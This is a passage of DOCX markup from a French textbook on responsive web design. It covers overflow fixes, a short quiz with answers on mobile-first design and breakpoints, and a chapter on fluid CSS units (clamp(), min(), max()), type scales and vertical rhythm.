        <w:t xml:space="preserve">  .carte__image { aspect-ratio: 1; border-radius: 8px; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La taille du conteneur, et non celle de la fenêtre, décide de la disposition : la même carte s'adapte dans une barre latérale et dans une zone principale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container-type: inline-size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doit être déclaré sur un ancêtre direct ou lointain, mais pas sur l'élément lui-même.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 21.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Défauts fréquents : un tableau qui déborde, un titre qui ne se coupe pas, une image sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>max-width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, un menu qui dépasse.</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html, body { max-width: 100%; overflow-x: clip; }</w:t>
        <w:br/>
        <w:t>img, video, iframe { max-width: 100%; height: auto; }</w:t>
        <w:br/>
        <w:t>h1, h2, h3 { overflow-wrap: break-word; }</w:t>
        <w:br/>
        <w:t>.tableau { overflow-x: auto; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>overflow-x: clip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> masque le symptôme sans corriger la cause : il ne remplace pas l'identification de l'élément fautif, mais évite un défilement catastrophique en attendant.</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 signifie mobile-first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Créer une version mobile séparée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Écrire d'abord les styles pour petit écran puis les enrichir</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Bloquer l'accès sur ordinateur</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 xml:space="preserve">Utiliser des media queries </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max-width</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Où choisir un point de rupture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Sur la largeur d'un iPhone précis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Là où la mise en page se casse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Tous les 100 pixels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À 1920 pixels</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 fait une container query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Adapte selon la fenêtre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Adapte selon la largeur du conteneur</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Adapte selon l'appareil</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Adapte selon la police</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Quelle unité de hauteur s'adapte aux barres d'interface mobile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vh</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dvh</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px</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Quel test révèle le plus vite les problèmes de responsive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Une capture sur grand écran</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La fenêtre réduite à 320 pixels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L'impression</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 mode sombre</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Les styles de base visent le petit écran ; les media queries </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ajoutent des améliorations.</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Le contenu dicte le seuil ; les appareils changent, les problèmes de composition restent.</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Elle permet à un composant de réagir à son propre espace, indépendamment de la fenêtre.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dvh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suit la hauteur dynamique du viewport, contrairement à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui ignore les barres d'URL.</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À 320 pixels, les débordements et les contenus insécables apparaissent immédiatement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>22. Unités fluides et rythme vertical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Composer entre deux tailles d'écran : ni sauts brutaux, ni mesures arbitraires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 21</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Utiliser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>clamp()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>min()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>max()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> à bon escient.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Construire une échelle fluide de tailles et d'espacements.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Établir un rythme vertical cohérent.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Éviter les pièges des unités relatives imbriquées.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Vérifier les compositions intermédiaires, pas seulement les extrêmes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>22.1 Trois fonctions de bornage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>max()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>clamp()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> comparent des valeurs et en choisissent une. Elles remplacent la plupart des media queries de typographie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.69 — Trois fonctions de comparaison</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59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Fonction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="382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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>min(a, b)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>La plus petite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>width: min(100%, 40rem)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>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max(a, b)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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La plus grande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="382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padding: max(1rem, 2vw)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>clamp(min, idéal, max)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bornée entre deux valeurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>font-size: clamp(1rem, 2vw, 1.5rem)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un ensemble fluide, sans media query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.conteneur { width: min(100% - 2rem, 68ch); margin-inline: auto; }</w:t>
        <w:br/>
        <w:t>h1 { font-size: clamp(2rem, 1.2rem + 3.2vw, 3.75rem); line-height: 1.05; }</w:t>
        <w:br/>
        <w:t>h2 { font-size: clamp(1.5rem, 1.1rem + 1.6vw, 2.25rem); line-height: 1.15; }</w:t>
        <w:br/>
        <w:t>.section { padding-block: clamp(2rem, 5vw, 5rem); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La valeur idéale s'écrit sous la forme </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>base + pente × vw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. La pente détermine la vitesse de croissance ; la base ajuste le point de départ. Une pente de 3vw signifie que la taille augmente de 3 % de la largeur de la fenêtre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2349500"/>
            <wp:docPr id="33" name="Picture 33"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f31.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2349500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.31 — Deux façons de faire varier une taille</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>22.2 Construire une échelle fluide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une échelle fluide se définit une fois, dans les jetons, puis se réutilise partout. Elle évite les tailles inventées au cas par cas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une échelle de cinq niveaux, calculée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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --echelle-ratio: 1.2;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte-min: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte-max: 1.125rem;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  --taille-0: clamp(1rem, .96rem + .2vw, 1.125rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-1: clamp(1.2rem, 1.1rem + .5vw, 1.45rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-2: clamp(1.44rem, 1.26rem + .9vw, 1.9rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-3: clamp(1.73rem, 1.44rem + 1.4vw, 2.5rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-4: clamp(2.07rem, 1.63rem + 2.2vw, 3.3rem);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Entre 320 et 1440 pixels, chaque niveau évolue continûment. Au-delà de 1440, les tailles sont plafonnées : un écran de 4K n'a pas besoin de titres de 200 pixels.</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LE PIÈGE DU ZOOM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Les unités </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>vw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ne réagissent pas au zoom du navigateur de la même façon que les </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>rem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>rem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans la formule de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>clamp()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (par exemple </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1.2rem + 2vw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">), jamais </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>vw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> seul, pour préserver l'accessibilité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>22.3 Rythme vertical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le rythme vertical est la régularité des espacements entre blocs. Il se construit à partir d'une unité de base — souvent la hauteur de ligne du corps — et de multiples de cette unité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un rythme fondé sur l'interligne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body {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --lh: 1.6;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --unite: calc(1rem * var(--lh));   /* 25,6 px si la police fait 16 px */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: var(--lh);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>h1 { margin-block: calc(var(--unite) * 2) var(--unite); }</w:t>
        <w:br/>
        <w:t>h2 { margin-block: calc(var(--unite) * 1.5) calc(var(--unite) * .5); }</w:t>
        <w:br/>
        <w:t>p  { margin-block: 0 var(--unite); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.70 — Quatre niveaux d'espacement vertical</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83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Espacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
